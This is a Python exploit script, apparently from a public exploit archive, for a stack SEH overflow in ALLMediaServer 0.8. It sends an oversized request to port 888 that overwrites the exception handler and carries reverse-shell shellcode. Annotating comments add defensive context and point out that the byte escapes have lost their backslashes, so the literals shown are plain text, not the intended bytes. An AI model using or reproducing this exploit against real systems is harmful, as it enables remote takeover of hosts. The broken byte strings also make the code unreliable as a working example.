
# Title : ALLMediaServer 0.8 SEH Overflow Exploit
# Published : 2012-07-06
# Author :


# Exploit Title: SEH overflow (BOF) exploit
# Date: 04/07/2012
# Exploit Author: motaz reda 
# my E-mail:  motazkhodair@gmail.com
# Software Link: http://allmediaserver.org/
# Version: ALLMediaServer 0.8
# Tested On: Windows 7 Ultimate
################################################

#!/usr/bin/python

import sys, socket

# Proof-of-concept for the ALLMediaServer 0.8 SEH overflow described in the
# header: a single TCP connection to port 888 carrying one oversized request.
#
# NOTE(review): the escape sequences in the literals below have lost their
# backslashes in extraction ("xeb" rather than "\xeb"), so as written they are
# plain ASCII text, not the bytes the comments describe.  The script is
# Python 2 style (a str is passed to send()); Python 3 would require bytes.
#
# Defensive notes: SEH-record overwrites of this shape are what SafeSEH and
# SEHOP exist to block, and DEP/ASLR affect both the fixed gadget address and
# the execution of the appended payload.  On the wire this is a single
# ~1.4 KB request to port 888 consisting largely of a run of "A" bytes,
# which is a simple signature for network detection.
s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)

# Target host is the first command-line argument; the service port is fixed.
s.connect((sys.argv[1], 888))

# Padding: 1072 bytes reach the SEH record on the stack (per the author's
# analysis; the offset is not derived anywhere in this script).
# `buffer` shadows a Python 2 builtin; harmless here but worth noting.
buffer = "A" * 1072

buffer += "xebx06x90x90"   # nSEH: "jmp short 6" (per the author) followed by two NOPs

buffer += "xcax24xecx65"   # SEH: address of a POP/POP/RETN gadget (per the author)

# Payload: generated with msfpayload windows/shell_reverse_tcp (per the author).
# The author notes it can be swapped for any other payload.

buffer += ("xd9xc8xd9x74x24xf4xb8xa6xaaxb6xadx5bx2bxc9xb1"
"x4fx83xebxfcx31x43x15x03x43x15x44x5fx4ax45x01"
"xa0xb3x96x71x28x56xa7xa3x4ex12x9ax73x04x76x17"
"xf8x48x63xacx8cx44x84x05x3axb3xabx96x8bx7bx67"
"x54x8ax07x7ax89x6cx39xb5xdcx6dx7exa8x2fx3fxd7"
"xa6x82xafx5cxfax1excexb2x70x1exa8xb7x47xebx02"
"xb9x97x44x19xf1x0fxeex45x22x31x23x96x1ex78x48"
"x6cxd4x7bx98xbdx15x4axe4x11x28x62xe9x68x6cx45"
"x12x1fx86xb5xafx27x5dxc7x6bxa2x40x6fxffx14xa1"
"x91x2cxc2x22x9dx99x81x6dx82x1cx46x06xbex95x69"
"xc9x36xedx4dxcdx13xb5xecx54xfex18x11x86xa6xc5"
"xb7xccx45x11xc1x8ex01xd6xffx30xd2x70x88x43xe0"
"xdfx22xccx48x97xecx0bxaex82x48x83x51x2dxa8x8d"
"x95x79xf8xa5x3cx02x93x35xc0xd7x33x66x6ex88xf3"
"xd6xcex78x9bx3cxc1xa7xbbx3ex0bxdexfcxa9x74x49"
"x03x3ex1dx88x03x2fx81x05xe5x25x29x40xbexd1xd0"
"xc9x34x43x1cxc4xdcxe0x8fx83x1cx6exacx1bx4bx27"
"x02x52x19xd5x3dxccx3fx24xdbx37xfbxf3x18xb9x02"
"x71x24x9dx14x4fxa5x99x40x1fxf0x77x3exd9xaax39"
"xe8xb3x01x90x7cx45x6ax23xfax4axa7xd5xe2xfbx1e"
"xa0x1dx33xf7x24x66x29x67xcaxbdxe9x97x81x9fx58"
"x30x4cx4axd9x5dx6fxa1x1ex58xecx43xdfx9fxecx26"
"xdaxe4xaaxdbx96x75x5fxdbx05x75x4a")

# One send of the crafted request; nothing is read back, so the script gives
# no indication of whether the service crashed or the handler ran.
s.send(buffer)

# The socket is not closed on an exception path (no try/finally or `with`).
s.close()